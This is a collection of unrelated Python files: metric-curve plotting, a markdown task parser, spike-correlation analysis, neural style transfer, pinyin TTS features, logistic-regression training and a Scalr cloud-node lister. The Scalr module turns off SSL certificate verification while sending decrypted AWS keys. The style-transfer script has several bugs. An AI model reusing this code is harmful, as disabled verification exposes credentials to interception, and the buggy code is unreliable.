elif curve_type.upper() == 'PRC':
x[i] = var2
y[i] = var1
# Calc AUC
auc_[i] = auc(x[i], y[i])
return (x, y, auc_)
def plot_curve_metric(x, y, auc, curve_type, title=None, labels=None):
"""
Plot ROC or PRC curves per output channel.
Args:
- x (dict) - Dict of numpy arrays for values to plot on x axis.
- y (dict) - Dict of numpy arrays for values to plot on x axis.
- auc (dict) - Dict of numpy arrays for areas under each curve.
- curve_type (str) - One of 'ROC' or 'PRC' to denote type of curve.
- title
- labels
Returns:
- pyplot object of curves.
"""
# Generate figure
plt.figure()
# Linetype spec
lw = 2
curve_type = curve_type.upper()
# Get the number of channels being plotted
n_chan = len(x)
# Make labels numeric if not provided
if labels is None:
labels = list(range(n_chan))
# Check to make sure the labels are the right length
if len(labels) != n_chan:
raise ValueError('Number of labels ({}) does not match number of prediction channels ({}).'.format(len(labels), n_chan))
# Get a lit of colors for all the channels
color_list = plt.cm.Set1(np.linspace(0, 1, n_chan))
# Plot each line
for i, color in enumerate(color_list):
plt.plot(x[i], y[i], color=color,
lw=lw, label='{} (area = {:0.2f})'.format(labels[i], auc[i]))
# Add labels and diagonal line for ROC
if curve_type == 'ROC':
xlab = 'FPR'
ylab = 'TPR'
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.legend(loc="lower right")
# Add labels for PRC
elif curve_type == 'PRC':
xlab = 'Recall'
ylab = 'Precision'
plt.legend(loc="lower left")
# Extend limits, add labels and title
plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
plt.xlabel(xlab)
plt.ylabel(ylab)
if title is not None:
plt.title('{} for {}'.format(curve_type, title))
else:
plt.title('{}'.format(curve_type))
return plt
def plot_curve(preds, target, curve_type, title=None, labels=None,
squareform=False):
"""
Wrapper to directly plot curves from model output and target.
Args:
- preds (np array-like) - Array or tensor of predicted values output by
model.
- target (np array-like) - Array or tensor of target values.
- curve_type (str) - One of 'ROC' or 'PRC'.
- title (str) - Title of plot (default = None).
- labels (list) - List of labels for each channel on the plot
(default = None).
- squareform (bool) - Whether the predictions and targets are in square form
(default = False).
"""
x, y, auc_ = calc_metric_curve(preds, target, curve_type, squareform)
return plot_curve_metric(x, y, auc_, curve_type, title, labels)
##################################
# Intermediate outputs/gradients #
##################################
|
<reponame>zeke/sota-extractor
import io
import logging
from typing import List
import markdown
from markdown.treeprocessors import Treeprocessor
from markdown.extensions.tables import TableExtension
from sota_extractor.taskdb.v01 import Task, Dataset, TaskDB
from sota_extractor.scrapers.nlp_progress.fixer import fix_task
from sota_extractor.scrapers.nlp_progress.parsers import (
Text,
parse_sota,
parse_subdatasets,
)
logger = logging.getLogger(__name__)
class ParserProcessor(Treeprocessor):
def __init__(self, md=None):
super().__init__(md=md)
self.parsed: List[Task] = []
def run(self, root):
# Assumptions:
# 1) H1 are tasks
# 2) Everything until the next heading is the task description
# 3) H2 are subtasks, H3 are datasets, H4 are subdatasets
# Algorithm:
# 1) Split the document by headings
sections = []
cur = []
for el in root:
if el.tag in {"h1", "h2", "h3", "h4", "h5"}:
if cur:
sections.append(cur)
cur = [el]
else:
cur = [el]
else:
cur.append(el)
if cur:
sections.append(cur)
# 2) Parse each heading section one-by-one
task = None # current task element being parsed
subtask = None # current subtask being parsed
dataset = None # current dataset being parsed
for section_index in range(len(sections)):
section = sections[section_index]
header = section[0]
if header.text is None:
# Invalid section
continue
# Task definition
if header.tag == "h1":
if task is not None:
self.parsed.append(task)
task = Task(
name=header.text.strip().title(),
description=Text.parse(
[e for e in section if e.tag == "p"]
).text,
)
# reset subtasks and datasets
subtask = None
dataset = None
# Subtask definition
if header.tag == "h2":
if task is None:
logger.error(
"Unexpected subtask without a parent task at: %s",
header.text,
)
# new substask
subtask = Task(
name=header.text.strip().title(),
description=Text.parse(
[e for e in section if e.tag == "p"]
).text,
parent=task,
)
task.subtasks.append(subtask)
# reset the last dataset
dataset = None
# Dataset definition
if header.tag == "h3" and "Table of content" not in header.text:
if task is None:
logger.error(
"Unexpected dataset without a parent task at: %s",
header.text,
)
tables = [t for t in section if t.tag == "table"]
n_tables = len(tables)
if n_tables < 2:
text = Text.parse([e for e in section if e.tag == "p"])
dataset = Dataset(
name=header.text.strip().strip(":"),
description=text.text,
links=text.links,
)
if n_tables == 1:
dataset.sota = parse_sota(tables[0])
else:
table_idxs = [
i for i, el in enumerate(section) if el.tag == "table"
]
pairs = []
for idx in table_idxs:
if idx >= 2 and section[idx - 1].tag == "p":
pairs.append((section[idx - 1], section[idx]))
description_idxs = set(range(1, len(section))) - set(
table_idxs
)
description_ps = [
el
for i, el in enumerate(section)
if i in description_idxs
]
text = Text.parse(description_ps)
dataset = Dataset(
name=header.text.strip().strip(":"),
description=text.text,
links=text.links,
)
dataset.subdatasets = parse_subdatasets(
parent=dataset, pairs=pairs
)
if subtask is not None:
# we are in a subtask, add everything here
subtask.datasets.append(dataset)
else:
task.datasets.append(dataset)
if task:
self.parsed.append(task)
class Markdown(markdown.Markdown):
def __init__(self):
super().__init__(extensions=[TableExtension()])
self.parser_processor = ParserProcessor(self)
self.treeprocessors.register(
self.parser_processor, "parser_processor", 1
)
def parse_file(filename: str) -> TaskDB:
"""Parse an NLP-Progress markdown file and return a TaskDB instance."""
md = Markdown()
with io.open("/dev/null", "wb") as f:
md.convertFile(filename, output=f)
tdb = TaskDB()
for task in md.parser_processor.parsed:
for t in fix_task(task):
tdb.add_task(t)
return tdb
|
<filename>code/analysis/plot_mean_activity_correlations.py<gh_stars>1-10
import matplotlib
matplotlib.use('Agg')
import numpy as np
from scipy.stats import alpha
from scipy.stats import pearsonr
import pylab as pl
import seaborn
import sys
import json
import yaml
sys.path.append("code/striatal_model")
import params
from colors import colors
from plot_tools2 import *
spikes_fn = sys.argv[1]
channels_fn = sys.argv[2]
experiment_fn = sys.argv[3]
hemisphere = sys.argv[4]
out_fn = sys.argv[5]
# spike data of the channels
data = np.loadtxt(spikes_fn)
senders = data[:, 0]
unique_senders = np.unique(senders) # all active senders
times = data[:, 1]
with open(channels_fn, "r+") as f:
channels = json.load(f)
channels = channels['channels']
with open(experiment_fn, "r+") as f:
cfg = yaml.load(f)
stim_times_start, stim_times_stop = get_stim_times(
cfg, hemisphere, params, mask=False)
all_d1 = np.ravel([c['d1'] for c in channels])
all_d2 = np.ravel([c['d2'] for c in channels])
spikes_d1 = np.hstack([times[np.where(senders == nid)[0]] for nid in all_d1])
spikes_d2 = np.hstack([times[np.where(senders == nid)[0]] for nid in all_d2])
spikes_d1_stim = np.array([])
spikes_d2_stim = np.array([])
spikes_d1_bckgrnd = np.array([])
spikes_d2_bckgrnd = np.array([])
for i, t in enumerate(spikes_d1):
for boundaries in zip(stim_times_start, stim_times_stop):
if t >= boundaries[0] + transient_duration and t < boundaries[1]:
spikes_d1_stim = np.append(spikes_d1_stim, t)
for i, t in enumerate(spikes_d2):
for boundaries in zip(stim_times_start, stim_times_stop):
if t >= boundaries[0] + transient_duration and t < boundaries[1]:
spikes_d2_stim = np.append(spikes_d2_stim, t)
for i, t in enumerate(spikes_d1):
for boundaries in zip(stim_times_start, stim_times_stop):
if t < boundaries[0] or t >= boundaries[1] + transient_duration:
spikes_d1_bckgrnd = np.append(spikes_d1_bckgrnd, t)
for i, t in enumerate(spikes_d2):
for boundaries in zip(stim_times_start, stim_times_stop):
if t < boundaries[0] or t >= boundaries[1] + transient_duration:
spikes_d2_bckgrnd = np.append(spikes_d2_bckgrnd, t)
cc_all = []
cc_stim = []
cc_stim_var = []
cc_stim_shuff = []
cc_stim_shuff_var = []
cc_bckgrnd = []
cc_bckgrnd_var = []
cc_bckgrnd_shuff = []
cc_bckgrnd_shuff_var = []
binsizes = np.linspace(10, 600, 30)
for binsize in binsizes:
# runtime for correlations is 10 times longer
bins = np.arange(0, int(params.runtime) * 10, binsize)
stim_bins = np.array([])
bckgrnd_bins = np.array([])
for t in bins:
for boundaries in zip(stim_times_start, stim_times_stop):
if t >= boundaries[0] and t < boundaries[1]:
stim_bins = np.append(stim_bins, t)
bckgrnd_bins = np.array([b for b in bins if not b in stim_bins])
hist_d1 = np.histogram(spikes_d1, bins=bins)[0].astype(
'float') * 1000. / (binsize * len(all_d1))
hist_d2 = np.histogram(spikes_d2, bins=bins)[0].astype(
'float') * 1000. / (binsize * len(all_d2))
hist_d1_stim = np.histogram(spikes_d1_stim, bins=stim_bins)[
0].astype('float') * 1000. / (binsize * len(all_d1))
hist_d2_stim = np.histogram(spikes_d2_stim, bins=stim_bins)[
0].astype('float') * 1000. / (binsize * len(all_d2))
hist_d1_bckgrnd = np.histogram(spikes_d1_bckgrnd, bins=bckgrnd_bins)[
0].astype('float') * 1000. / (binsize * len(all_d1))
hist_d2_bckgrnd = np.histogram(spikes_d2_bckgrnd, bins=bckgrnd_bins)[
0].astype('float') * 1000. / (binsize * len(all_d2))
# split the histograms into 3 parts, to have 3 data points for corrcoef
hist_d1_bckgrnd_split = np.array_split(hist_d1_bckgrnd, 3)
hist_d2_bckgrnd_split = np.array_split(hist_d2_bckgrnd, 3)
if experiment_fn == 'sequences.yaml' or experiment_fn == 'sequencesd1d2.yaml' or experiment_fn == 'competingActions.yaml':
split_num = 3
else:
split_num = 3 # Too short sequences for sequences<x>.yaml
hist_d1_stim_split = np.array_split(hist_d1_stim, split_num)
hist_d2_stim_split = np.array_split(hist_d2_stim, split_num)
cc_bck_split = []
for x, y in zip(hist_d1_bckgrnd_split, hist_d2_bckgrnd_split):
cc_bck_split.append(correlate2(x, y)[1, 0])
cc_stim_split = []
for x, y in zip(hist_d1_stim_split, hist_d2_stim_split):
cc_stim_split.append(correlate2(x, y)[1, 0])
cc_all.append(correlate2(hist_d1, hist_d2)[1, 0])
cc_stim.append(np.mean(cc_stim_split))
cc_stim_var.append(np.std(cc_stim_split))
cc_bckgrnd.append(np.mean(cc_bck_split))
cc_bckgrnd_var.append(np.std(cc_bck_split))
hist_d1_stim_shuf = np.copy(hist_d1_stim)
hist_d2_stim_shuf = np.copy(hist_d2_stim)
hist_d1_bckgrnd_shuf = np.copy(hist_d1_bckgrnd)
hist_d2_bckgrnd_shuf = np.copy(hist_d2_bckgrnd)
temp_stim = []
temp_bckgrnd = []
for x in xrange(10): # 10 trials
np.random.shuffle(hist_d1_stim_shuf)
np.random.shuffle(hist_d2_stim_shuf)
np.random.shuffle(hist_d1_bckgrnd_shuf)
np.random.shuffle(hist_d2_bckgrnd_shuf)
temp_stim.append(correlate2(
hist_d1_stim_shuf, hist_d2_stim_shuf)[1, 0])
temp_bckgrnd.append(correlate2(
hist_d1_bckgrnd_shuf, hist_d2_bckgrnd_shuf)[1, 0])
cc_stim_shuff.append(np.mean(temp_stim))
cc_stim_shuff_var.append(np.std(temp_stim))
cc_bckgrnd_shuff.append(np.mean(temp_bckgrnd))
cc_bckgrnd_shuff_var.append(np.std(temp_bckgrnd))
fig = pl.figure(0, figsize=[16, 10])
ax = fig.add_subplot(2, 1, 1)
ax.plot(np.arange(len(hist_d1)) / (1000. / binsize), hist_d1, label='D1')
ax.plot(np.arange(len(hist_d2)) / (1000. / binsize), hist_d2, label='D2')
ax.set_ylabel("Mean activity (spikes/sec)", fontsize=20, fontweight='bold')
ax.set_xlabel("Time (s)", fontsize=20, fontweight='bold')
ax.legend(prop={'size': 15, 'weight': 'bold'}, loc='best')
for x in ax.get_xticklabels():
x.set_fontweight('bold')
x.set_fontsize(14)
for x in ax.get_yticklabels():
x.set_fontweight('bold')
x.set_fontsize(14)
ax = fig.add_subplot(2, 1, 2)
ax.plot(binsizes, cc_stim, '.-', label='stimulation',
color=colors[1], markersize=20.)
ax.fill_between(binsizes, np.array(cc_stim) - np.array(cc_stim_var),
np.array(cc_stim) + np.array(cc_stim_var), color=colors[1], alpha=0.2)
ax.plot(binsizes, cc_stim_shuff, '.--', label='stimulation-shuffled',
color=colors[2], markersize=20.)
ax.fill_between(binsizes, np.array(cc_stim_shuff) - np.array(cc_stim_shuff_var),
np.array(cc_stim_shuff) + np.array(cc_stim_shuff_var), color=colors[2], alpha=0.2)
ax.plot(binsizes, cc_bckgrnd, '.-', label='background',
color=colors[3], markersize=20.)
ax.fill_between(binsizes, np.array(cc_bckgrnd) - np.array(cc_bckgrnd_var),
np.array(cc_bckgrnd) + np.array(cc_bckgrnd_var), color=colors[3], alpha=0.2)
ax.plot(binsizes, cc_bckgrnd_shuff, '.--',
label='background-shuffled', color=colors[4], markersize=20.)
ax.fill_between(binsizes, np.array(cc_bckgrnd_shuff) - np.array(cc_bckgrnd_shuff_var),
np.array(cc_bckgrnd_shuff) + np.array(cc_bckgrnd_shuff_var), color=colors[4], alpha=0.2)
ax.set_xlabel("Bin size (ms)", fontsize=20, fontweight='bold')
ax.set_ylabel("Average cross correlation", fontsize=20, fontweight='bold')
ax.legend(prop={'size': 15, 'weight': 'bold'}, loc='best')
for x in ax.get_xticklabels():
x.set_fontweight('bold')
x.set_fontsize(14)
for x in ax.get_yticklabels():
x.set_fontweight('bold')
x.set_fontsize(14)
pl.savefig(out_fn)
|
<reponame>kbhartiya/NeuralPrisma<filename>nst.py
import tensorflow as tf
import numpy as np
import os
import sys
import scipy.io
import scipy.misc
import matplotlib.pyplot as plt
from PIL import Image
from nst_utils import *
import warnings; warnings.filterwarnings("ignore")
def compute_content_cost(a_C, a_G):
"""
Computes the content cost
Arguments:
a_C -- tensor of dimension (1, n_H, n_W, n_C), hidden layer activations representing content of the image C
a_G -- tensor of dimension (1, n_H, n_W, n_C), hidden layer activations representing content of the image G
Returns:
J_content.
"""
m, n_H, n_W, n_C = a_G.get_shape().as_list()
a_C_unrolled = tf.transpose(tf.reshape(a_C,[-1]))
a_G_unrolled = tf.transpose(tf.reshape(a_G,[-1]))
norm = n_H*n_W*n_C
J_content = 0.25*(1/norm)*tf.reduce_sum((a_C_unrolled-a_G_unrolled)**2)
return J_content
def gram_matrix(A):
"""
Style Matrix
------------
Argument:
A -- matrix of shape (n_C, n_H*n_W)
Returns:
GA -- Gram matrix of A, of shape (n_C, n_C)
"""
GM = tf.matmul(A,A,transpose_b=True)
return GM
def compute_style_layer_cost(a_S, a_G):
"""
Computes the style cost for each layer.
Arguments:
a_S -- tensor of dimension (1, n_H, n_W, n_C), hidden layer activations representing style of an image.
a_G -- tensor of dimension (1, n_H, n_W, n_C), hidden layer activations representing style of generated image.
returns:
style_layer_cost.
"""
m, n_H, n_W, n_C = a_G.get_shape().as_list()
a_S = tf.transpose(tf.reshape(a_S,[n_H*n_W,n_C]))
a_G = tf.transpose(tf.reshape(a_G,[n_H*n_W,n_C]))
GS = gram_matrix(a_S)
GG = gram_matrix(a_G)
style_layer_cost = tf.reduce_sum((GS-GG)**2)/(4*(n_C)**2*(n_H*n_W)**2)
return style_layer_cost
def compute_style_cost(model, style_layers, sess):
"""
Computes style cost for all the layers.
Arguments:
model -- model(in this case VGG19 model).
style_layers -- List of tuples in which each tuple has:
- The layers from which we want to extract our style from.
- The corresponding coefficients for each layer.
sess -- The session.
returns:
J_style.
"""
J_style = 0
for layer, k in style_layers:
out = model[layer]
a_S = sess.run(out)
a_G = out
J_style += k*compute_style_layer_cost(a_S, a_G)
return J_style
def total_cost(J_content, J_style, alpha=None, beta=None):
return alpha*J_content + beta*J_style
#reset the graph
tf.reset_default_graph()
#Initiate an Interactive Session.
sess = tf.InteractiveSession()# error may occur so be careful.
#content_image
content_image = scipy.misc.imread("/images/contentsample.jpg")
content_image = reshape_and_normalize(content_image)
#style_image
style_image = scipy.misc.imread("/images/stylesample.jpg")
style_image = reshape_and_normalize(style_image)
#generate noisy image.
generate_image = generate_noise_image(content_image)
#Load the VGG19 model to model.
model = load_vgg_model("vggmodel/imagenet-vgg-verydeep-19.mat")
#pass the content image to the model.
sess.run(model['input'].assign(content_image))
#Now store the 'conv4_2' activation for the content image in 'out'.
out = model['conv4_2']
a_C = sess.run(out)
a_G = out
#Compute Content cost.
J_content = compute_content_cost(a_C, a_G)
#Style Layers.
STYLE_LAYERS = [('conv1_1', 0.1),('conv2_1', 0.1),('conv3_1', 0.1),('conv4_1', 0.3),('conv5_1', 0.4)]
#Pass the style image to the model.
sess.run(model['input'].assign(style_image))
#Compute style cost.
J_style = compute_style_cost(model, STYLE_LAYERS, sess)
#Compute the total cost.
J = total_cost(J_content, J_style, alpha=10, beta=50)
#Optimizer for training.
optimizer = tf.train.AdamOptimizer(0.001)
train = optimizer.minimize(J)
def model_nn(sess, input_image, num_iterations):
#initialize all variables.
sess.run(tf.global_variable_initializer())
#input the randoml generated image to the VGG19 model.
sess.run(model['input'].assign(input_image))
for i in range(num_iterations):
sess.run(train)
#Compute the generated image by running it in the model.
generated_image = sess.run(model['input'])
if i%20:
J, J_content, J_style = sess.run([J, J_content, J_style])
print("Total Cost: {}".format(J))
print("Total Content Cost: {}".format(J_content))
print("Total Style Cost: {}".format(J_style))
save_image('./output/generated_image_no'+str(i)+'.png', generated_image)
save_image("./output/final_generated_image.jpg", generated_image)
return generated_images
|
################################################################################
# Author: BigBangEpoch <<EMAIL>>
# Date : 2018-12-24
# Copyright (c) 2018-2019 BigBangEpoch All rights reserved.
################################################################################
from cute.common.mapper import pinyin_mapper
from cute.common.mapper import ph_dur_mapper
import numpy as np
def separate_phoneme_tone(pinyin_str):
"""
separate phoneme and tone from given pinyin string. tone is set to 0 if there is not any
:param pinyin_str: pinyin string
:return:
phoneme(str) and tone(int)
example:
print(separate_phoneme_tone('wan3')) => ('wan', 3)
print(separate_phoneme_tone('ai2')) => ('ai', 2)
print(separate_phoneme_tone('h')) => ('h', 0)
"""
if pinyin_str[-1].isdigit():
phoneme = pinyin_str[0:-1]
tone = int(pinyin_str[-1])
else:
phoneme = pinyin_str
tone = 0
return phoneme, tone
def pinyin_to_phoneme_list(pinyin_str, pinyin_parser):
"""
convert input pinyin string to a list of phoneme strings
:param pinyin_str: pinyin string
:param pinyin_parser: a map from pinyin to phoneme pair: (consonant, vowel)
:return:
a list of phoneme strings
example:
input: 'ka2 er2 pu3 pei2 wai4 sun1 , wan2 hua2 ti1'
output:['k','a2','er2','p','u3','p','ei2','uai4','s','uen1','sp','uan2','h','ua2','t','i1']
"""
phoneme_list = []
for py in pinyin_str.split():
if py in [',', '.']:
phoneme_list.append('sp1')
else:
ph, tone = separate_phoneme_tone(py) # sun1 => sun, 1
assert ph in pinyin_parser, '%s not found.' % ph
k1, k2 = pinyin_parser[ph] # sun => s, uen
if k2 == '':
phoneme_list.append(k1 + str(tone))
else:
phoneme_list.append(k1)
phoneme_list.append(k2 + str(tone))
return phoneme_list
def eval_phoneme_duration(phoneme_list, phoneme_dur_parser):
"""
obtain duration for each phoneme in the phoneme_list
:param phoneme_list: a list of phoneme strings
:param phoneme_dur_parser: a map from phoneme to its duration
:return:
a list of (phoneme, duration) pairs
example:
input: ['k', 'a2', 'er2', 'p', 'u3', 'p', 'ei2', 'uai4']
output:[('k', 18), ('a2', 32), ('er2', 40), ('p', 19), ('u3', 29), ('p', 19), ('ei2', 25), ('uai4', 38)]
"""
phoneme_duration_list = []
for ph in phoneme_list:
assert ph in phoneme_dur_parser['duration'], '%s not found.' % ph
ph_dur = (ph, int(phoneme_dur_parser['duration'][ph][1]))
phoneme_duration_list.append(ph_dur)
return phoneme_duration_list
def phoneme_to_feature_matrix(phoneme_dur_list, phoneme_dur_parser, feat_type='two_hot', min_val=0.01, max_val=0.99):
"""
convert a list of (phoneme, duration) pairs into a feature matrix for nn input
:param phoneme_dur_list: a list of (phoneme, duration) pairs
:param phoneme_dur_parser: maps containing phoneme to index and tone to index
:param feat_type: how to construct the feature: 'one_hot' or 'two_hot'
:param min_val: minimum for a one-hot vector
:param max_val: maximum for a one-hot vector
:return:
feature matrix of shape (num_frame, 260) for one-hot or (num_frame, 93) for two-hot
"""
assert feat_type in ['one_hot', 'two_hot']
phoneme_list = []
for ph in phoneme_dur_list:
for k in range(ph[1]):
phoneme_list.append(ph[0])
num_frame = len(phoneme_list)
# construct feature matrix
if feat_type == 'one_hot':
dim_feats = len(phoneme_dur_parser['duration'])
lab_feats = np.ones(shape=(num_frame, dim_feats), dtype=np.float32) * min_val
for k in range(num_frame):
lab_feats[k][phoneme_dur_parser['duration'][phoneme_list[k]][0]] = max_val
else:
dim_feats = len(phoneme_dur_parser['phone_set'])+len(phoneme_dur_parser['tone_set'])
lab_feats = np.ones(shape=(num_frame, dim_feats), dtype=np.float32) * min_val
for k in range(num_frame):
ph, tone = separate_phoneme_tone(phoneme_list[k])
lab_feats[k][phoneme_dur_parser['phone_set'][ph]] = max_val
lab_feats[k][len(phoneme_dur_parser['phone_set'])+phoneme_dur_parser['tone_set'][str(tone)]] = max_val
return lab_feats
def pinyin_to_feature_matrix(pinyin_str, show=False):
phoneme_list = pinyin_to_phoneme_list(pinyin_str=pinyin_str, pinyin_parser=pinyin_mapper)
phoneme_dur_list = eval_phoneme_duration(phoneme_list=phoneme_list, phoneme_dur_parser=ph_dur_mapper)
feature_matrix = phoneme_to_feature_matrix(phoneme_dur_list=phoneme_dur_list, phoneme_dur_parser=ph_dur_mapper)
if show:
print(phoneme_list)
print(phoneme_dur_list)
print(feature_matrix.shape)
return feature_matrix
def test():
input_pinyin = 'ka2 er2 pu3 pei2 wai4 sun1 , wan2 hua2 ti1'
pinyin_to_feature_matrix(pinyin_str=input_pinyin, show=True)
if __name__ == '__main__':
test()
|
# -*- coding: utf-8 -*-
# -----------------------------------
# @CreateTime : 2020/3/20 0:49
# @Author : <NAME>
# @Email : <EMAIL>
# ------------------------------------
import sys, os
sys.path.insert(0, os.path.join(__file__, "../.."))
from core.dataloaders import DataLoader
from core.models import LogisticRegression
from core.common import *
import logging
logging.basicConfig(level=logging.DEBUG, format="%(asctime)s [%(levelname)s] %(process)d %(name)s: %(message)s")
@calc_time
def train(model, train_data_loader):
# 模型训练
logging.info("Start Training!")
max_iterations = MAX_ITERATIONS
for epoch in range(EPOCHS):
for i, (X, Y) in enumerate(train_data_loader, 0):
model.fit(X, Y)
if LOG_LEVEL <= logging.DEBUG and (i+1) % LOG_INTERVAL == 0:
eval_result = model.evaluate(model.predict(train_data_loader.X_to_valid), train_data_loader.Y_to_valid)
logging.debug("epoch: [{}/{}], iter: [{}/{}], err: [{}/{}], acc: {:.2f}%, loss: {:.6f}".format(
(epoch+1), EPOCHS, i+1, len(train_data_loader),*eval_result.values()))
max_iterations -= 1
if max_iterations < 0:
logging.info("Stopped training for reaching max iterations of {}".format(MAX_ITERATIONS))
return
else:
logging.info("Stopped training for reaching max epochs of {}".format(EPOCHS))
return
@calc_time
def load_train_data():
train_data_loader = DataLoader(
shuffle=SHUFFLE, use_mp=ENABLE_MULTI_PROCESSES, batch_size=BATCH_SIZE,
select_ratio=SELECT_RATIO, split_ratio=SPLIT_RATIO)
train_data_loader.load_XY(train_data_path)
return train_data_loader
@calc_time
def main():
# 加载训练集
train_data_loader = load_train_data()
# 模型初始化
lr = LogisticRegression(lr=LR)
lr.init_weight(train_data_loader.N_features)
# 模型训练
train(lr, train_data_loader)
# 加载预测集
test_data_loader = DataLoader(use_mp=ENABLE_MULTI_PROCESSES)
test_data_loader.load_X(test_data_path)
# 模型预测
Y_pred = lr.predict(test_data_loader.X)
lr.save_prediction(Y_pred, path=test_predict_path)
# 模型评估与持久化
if LOG_LEVEL <= logging.INFO:
test_data_loader.load_Y(test_answer_path)
test_result = lr.evaluate_data_loader(test_data_loader)
logging.info("[TEST RESULT] err: [{}/{}], acc: {:.2f}%".format(*test_result.values()))
lr.dump_weight(WEIGHTS_PATH)
if __name__ == '__main__':
# 根据平台控制程序的日志级别,设置成WARNIGN基本可以避免很多输出开销
LOG_LEVEL = logging.DEBUG if 'win' in sys.platform else logging.WARNING
# 是否启用多进程加载文件,在鲲鹏64核的帮助下此有奇效
ENABLE_MULTI_PROCESSES = True
SHUFFLE = True # 是否打乱训练数据顺序
WEIGHTS_PATH = os.path.join(DATA_DIR, "w.pkl")
SELECT_RATIO = 0.5
SPLIT_RATIO = 0.9 # 切割训练集与验证集比率
LOG_INTERVAL = 10
MAX_ITERATIONS = 100000 # 预期迭代次数计算公式: N_to_train / BS * Epochs
EPOCHS = 1
"""
以下是SGD使用办法,BS=1,靠人品
"""
LR = 0.5
BATCH_SIZE = 1
EPOCHS = 1
# MAX_ITERATIONS = 100000
"""
以下是Mini-Batch SGD使用办法,BS=10,靠人品
尝试:LR>=0.1, BS<=200,EPOCHS>=1
"""
LR = 0.25
BATCH_SIZE = 10
EPOCHS = 5
"""
大乱斗冠军参数(但线上并不够理想,在io、运算和算法上还有很大优化空间)
"""
LR = 0.01
BATCH_SIZE = 10
EPOCHS = 10
"""
如果追求准确率,建议:LR<=0.03, BS>=500, EPOCHS>=300
可以得到较好的结果:[TEST RESULT] err: [302/2000], acc: 84.90%
"""
LR = 0.1
BATCH_SIZE = 100
EPOCHS = 1
main()
|
<gh_stars>1-10
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013, 2014, 2015 Scalr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from gevent import monkey
monkey.patch_all()
import os
import sys
cwd = os.path.dirname(os.path.abspath(__file__))
scalrpy_dir = os.path.join(cwd, '..')
sys.path.insert(0, scalrpy_dir)
import ssl
import time
import uuid
import json
import socket
import gevent
import urllib2
import greenlet
import urlparse
import binascii
import StringIO
import boto.ec2
import boto.exception
import boto.ec2.regioninfo
import oauth2client.client
import libcloud.common.types
from libcloud.compute.types import Provider, NodeState
from libcloud.compute.providers import get_driver
import libcloud.security
libcloud.security.VERIFY_SSL_CERT = False
import httplib2
import googleapiclient
from googleapiclient.discovery import build
from oauth2client.service_account import ServiceAccountCredentials
from scalrpy.util import helper
from scalrpy.util import dbmanager
from scalrpy.util import analytics
from scalrpy.util import cryptotool
from scalrpy.util import application
from scalrpy import LOG
from scalrpy import exceptions
helper.patch_gevent()
app = None
os.environ['EC2_USE_SIGV4'] = 'TRUE'
@helper.retry(1, 5, urllib2.URLError, socket.timeout)
def _libcloud_list_locations(driver):
return driver.list_locations()
@helper.retry(1, 5, urllib2.URLError, socket.timeout)
def _libcloud_list_nodes(driver):
return driver.list_nodes()
@helper.retry(1, 5, urllib2.URLError, socket.timeout)
def _ec2_get_only_instances(ec2conn):
return ec2conn.get_only_instances(filters={'instance-state-name': 'running'})
@helper.retry(1, 5, urllib2.URLError, socket.timeout)
def _libcloud_get_service_catalog(driver):
return driver.connection.get_service_catalog()
def _handle_exception(e, msg):
if isinstance(e, boto.exception.EC2ResponseError) and e.status in (401, 403):
LOG.warning(msg)
elif isinstance(e, (libcloud.common.types.InvalidCredsError,
libcloud.common.types.LibcloudError,
libcloud.common.types.MalformedResponseError,
libcloud.common.exceptions.BaseHTTPError,
oauth2client.client.AccessTokenRefreshError,
gevent.timeout.Timeout,
socket.timeout,
socket.gaierror)):
LOG.warning(msg)
elif isinstance(e, socket.error):
LOG.warning(msg)
elif isinstance(e, googleapiclient.errors.HttpError) and e.resp['status'] in ('403',):
LOG.warning(msg)
elif isinstance(e, ssl.SSLError):
LOG.warning(msg)
elif isinstance(e, greenlet.GreenletExit):
pass
elif 'userDisabled' in str(e):
LOG.warning(msg)
elif isinstance(e, exceptions.MissingCredentialsError):
LOG.debug(msg)
else:
LOG.exception(msg)
def _ec2_region(region, cred):
try:
access_key = cryptotool.decrypt_scalr(app.crypto_key, cred['access_key'])
secret_key = cryptotool.decrypt_scalr(app.crypto_key, cred['secret_key'])
kwds = {
'aws_access_key_id': access_key,
'aws_secret_access_key': secret_key
}
proxy_settings = app.proxy_settings.get(cred.platform, {})
kwds['proxy'] = proxy_settings.get('host')
kwds['proxy_port'] = proxy_settings.get('port')
kwds['proxy_user'] = proxy_settings.get('user')
kwds['proxy_pass'] = proxy_settings.get('pass')
msg = "List nodes for platform: 'ec2', region: '{}', envs_ids: {}"
msg = msg.format(region, cred.envs_ids)
LOG.debug(msg)
conn = boto.ec2.connect_to_region(region, **kwds)
cloud_nodes = _ec2_get_only_instances(conn)
timestamp = int(time.time())
nodes = list()
for cloud_node in cloud_nodes:
node = {
'instance_id': cloud_node.id,
'instance_type': cloud_node.instance_type,
'os': cloud_node.platform if cloud_node.platform else 'linux'
}
nodes.append(node)
return {
'region': region,
'timestamp': timestamp,
'nodes': nodes
} if nodes else dict()
except:
e = sys.exc_info()[1]
msg = "platform: '{platform}', region: '{region}', envs_ids: {envs_ids}. Reason: {error}"
msg = msg.format(platform=cred.platform, region=region, envs_ids=cred.envs_ids,
error=helper.exc_info(where=False))
_handle_exception(e, msg)
def ec2(cred):
"""
:returns: list
[{'region': str, 'timestamp': int, 'nodes': list}]
"""
result = list()
regions = {
'regular': [
'us-east-1',
'us-west-1',
'us-west-2',
'eu-west-1',
'eu-central-1',
'ap-southeast-1',
'ap-southeast-2',
'ap-northeast-1',
'ap-northeast-2',
'sa-east-1',
],
'gov-cloud': ['us-gov-west-1'],
'cn-cloud': ['cn-north-1'],
}.get(cred.get('account_type'))
if not regions:
msg = "Unsupported account type for 'ec2' platform: '{}'".format(cred.get('account_type'))
raise Exception(msg)
app.pool.wait()
async_results = dict(
(region, app.pool.apply_async(_ec2_region, args=(region, cred,)))
for region in regions
)
gevent.sleep(0) # force switch
timeout = app.config['cloud_connection_timeout']
for region, async_result in async_results.iteritems():
try:
region_nodes = async_result.get(timeout=timeout)
if region_nodes:
result.append(region_nodes)
except gevent.timeout.Timeout:
